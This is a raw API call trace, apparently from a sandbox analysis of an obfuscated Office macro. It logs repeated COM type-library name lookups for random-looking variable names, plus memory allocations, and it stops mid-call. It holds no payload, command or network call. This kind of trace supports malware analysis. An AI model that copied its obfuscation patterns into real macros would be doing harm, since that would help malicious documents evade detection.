0xc [0068.446] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="aA1UQGXo", lHashVal=0x10fe52, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.446] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.446] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.446] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="aA1UQGXo", lHashVal=0x10fe52, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.446] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.446] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.446] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="aA1UQGXo", lHashVal=0x10fe52, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.447] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba265a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="aA1UQGXo") returned 9 [0068.447] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="aA1UQGXo", lHashVal=0x10fe52, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.447] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.447] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba265a | out: _Dst=0x67c2d60) returned 0x0 [0068.447] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aA1UQGXo") returned 0x10d5db [0068.447] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_aA1UQGXo" | out: _Dst="_B_var_aA1UQGXo") returned 0x0 [0068.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_aA1UQGXo") returned 16 [0068.447] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.447] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_aA1UQGXo", lHashVal=0x10d5db, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.447] IUnknown:Release (This=0x665ba50) returned 0xb [0068.447] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.447] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_aA1UQGXo", lHashVal=0x10d5db, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.447] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.447] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.447] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_aA1UQGXo", lHashVal=0x10d5db, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.447] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.447] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.447] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_aA1UQGXo", lHashVal=0x10d5db, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.447] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.447] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.447] IUnknown:Release (This=0x665ba50) returned 0xb [0068.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1a5a, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_aA1UQGXo") returned 16 [0068.447] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_aA1UQGXo", lHashVal=0x10d5db, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x61005f00720061, ppTypeComp=0x51005500000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x61005f00720061, ppTypeComp=0x51005500000000, pDummy=0x0) returned 0x0 [0068.447] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba265a | out: _Dst=0x145020) returned 0x0 [0068.448] ITypeComp:RemoteBind (in: This=0x665ba60, szName="OAAA_A4X", lHashVal=0x10a6f3, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba262e, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="OAAA_A4X") returned 9 [0068.448] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="OAAA_A4X", lHashVal=0x10a6f3, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba262e, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="OAAA_A4X") returned 9 [0068.448] ITypeComp:RemoteBind (in: This=0x665bd30, szName="OAAA_A4X", lHashVal=0x10a6f3, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.448] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OAAA_A4X") returned 0x10a6f3 [0068.448] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="OAAA_A4X" | out: _Dst="OAAA_A4X") returned 0x0 [0068.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="OAAA_A4X") returned 9 [0068.448] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.448] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="OAAA_A4X", lHashVal=0x10a6f3, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.448] IUnknown:Release (This=0x665ba50) returned 0xb [0068.448] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.448] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="OAAA_A4X", lHashVal=0x10a6f3, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.448] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.448] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.448] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="OAAA_A4X", lHashVal=0x10a6f3, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.448] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.448] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.448] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="OAAA_A4X", lHashVal=0x10a6f3, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.448] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba262e, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="OAAA_A4X") returned 9 [0068.448] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="OAAA_A4X", lHashVal=0x10a6f3, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.449] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.449] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba262e | out: _Dst=0x67c2d60) returned 0x0 [0068.449] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_OAAA_A4X") returned 0x107e7c [0068.449] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_OAAA_A4X" | out: _Dst="_B_var_OAAA_A4X") returned 0x0 [0068.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_OAAA_A4X") returned 16 [0068.449] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.449] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_OAAA_A4X", lHashVal=0x107e7c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.449] IUnknown:Release (This=0x665ba50) returned 0xb [0068.449] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.449] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_OAAA_A4X", lHashVal=0x107e7c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.449] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.449] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.449] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_OAAA_A4X", lHashVal=0x107e7c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.449] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.449] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.449] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_OAAA_A4X", lHashVal=0x107e7c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.449] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.449] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.449] IUnknown:Release (This=0x665ba50) returned 0xb [0068.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1a8a, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_OAAA_A4X") returned 16 [0068.449] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_OAAA_A4X", lHashVal=0x107e7c, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x4f005f00720061, ppTypeComp=0x5f004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x4f005f00720061, ppTypeComp=0x5f004100000000, pDummy=0x0) returned 0x0 [0068.449] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba262e | out: _Dst=0x145020) returned 0x0 [0068.449] ITypeComp:RemoteBind (in: This=0x665ba60, szName="U1ABAx", lHashVal=0x100302, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba26ae, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="U1ABAx") returned 7 [0068.450] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="U1ABAx", lHashVal=0x100302, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba26ae, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="U1ABAx") returned 7 [0068.450] ITypeComp:RemoteBind (in: This=0x665bd30, szName="U1ABAx", lHashVal=0x100302, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.450] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="U1ABAx") returned 0x100302 [0068.450] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="U1ABAx" | out: _Dst="U1ABAx") returned 0x0 [0068.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="U1ABAx") returned 7 [0068.450] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.450] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="U1ABAx", lHashVal=0x100302, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.450] IUnknown:Release (This=0x665ba50) returned 0xb [0068.450] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.450] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="U1ABAx", lHashVal=0x100302, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.450] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.450] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.450] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="U1ABAx", lHashVal=0x100302, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.450] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.450] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.450] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="U1ABAx", lHashVal=0x100302, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.450] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.450] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x44f0000 [0068.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba26ae, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="U1ABAx") returned 7 [0068.451] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="U1ABAx", lHashVal=0x100302, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.451] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d60 [0068.451] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x7, _Src=0x3ba26ae | out: _Dst=0x67c2d60) returned 0x0 [0068.451] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_U1ABAx") returned 0x107dab [0068.451] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_U1ABAx" | out: _Dst="_B_var_U1ABAx") returned 0x0 [0068.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_U1ABAx") returned 14 [0068.451] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.451] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_U1ABAx", lHashVal=0x107dab, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.452] IUnknown:Release (This=0x665ba50) returned 0xb [0068.452] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.452] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_U1ABAx", lHashVal=0x107dab, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.452] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.452] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.452] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_U1ABAx", lHashVal=0x107dab, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.452] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.452] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.452] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_U1ABAx", lHashVal=0x107dab, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.452] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.452] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.452] IUnknown:Release (This=0x665ba50) returned 0xb [0068.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1aba, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_U1ABAx") returned 14 [0068.452] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_U1ABAx", lHashVal=0x107dab, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x55005f00720061, ppTypeComp=0x41004200000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x55005f00720061, ppTypeComp=0x41004200000000, pDummy=0x0) returned 0x0 [0068.452] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba26ae | out: _Dst=0x145020) returned 0x0 [0068.452] IMalloc:Realloc (This=0x7fefec05380, pv=0x646f7f0, cb=0x60) returned 0x69503b0 [0068.452] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4500000 [0068.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba26d6, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="zCD4ADA") returned 8 [0068.453] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zCD4ADA", lHashVal=0x108033, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba26d6, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="zCD4ADA") returned 8 [0068.453] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zCD4ADA", lHashVal=0x108033, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba26d6, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="zCD4ADA") returned 8 [0068.453] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zCD4ADA", lHashVal=0x108033, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.454] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zCD4ADA") returned 0x108033 [0068.454] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="zCD4ADA" | out: _Dst="zCD4ADA") returned 0x0 [0068.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="zCD4ADA") returned 8 [0068.454] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.454] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zCD4ADA", lHashVal=0x108033, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.454] IUnknown:Release (This=0x665ba50) returned 0xb [0068.454] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.454] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zCD4ADA", lHashVal=0x108033, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.454] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.454] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.454] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zCD4ADA", lHashVal=0x108033, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.454] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.454] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.454] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zCD4ADA", lHashVal=0x108033, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.454] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba26d6, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="zCD4ADA") returned 8 [0068.454] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zCD4ADA", lHashVal=0x108033, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.454] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d60 [0068.454] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x8, _Src=0x3ba26d6 | out: _Dst=0x67c2d60) returned 0x0 [0068.454] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zCD4ADA") returned 0x107436 [0068.454] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_zCD4ADA" | out: _Dst="_B_var_zCD4ADA") returned 0x0 [0068.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_zCD4ADA") returned 15 [0068.454] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.455] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zCD4ADA", lHashVal=0x107436, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.455] IUnknown:Release (This=0x665ba50) returned 0xb [0068.455] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.455] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zCD4ADA", lHashVal=0x107436, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.455] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.455] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.455] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zCD4ADA", lHashVal=0x107436, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.455] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.455] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.455] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zCD4ADA", lHashVal=0x107436, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.455] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.455] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.455] IUnknown:Release (This=0x665ba50) returned 0xb [0068.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1aea, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_zCD4ADA") returned 15 [0068.455] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zCD4ADA", lHashVal=0x107436, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0) returned 0x0 [0068.455] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba26d6 | out: _Dst=0x145020) returned 0x0 [0068.455] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tAZGAZx", lHashVal=0x100d48, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 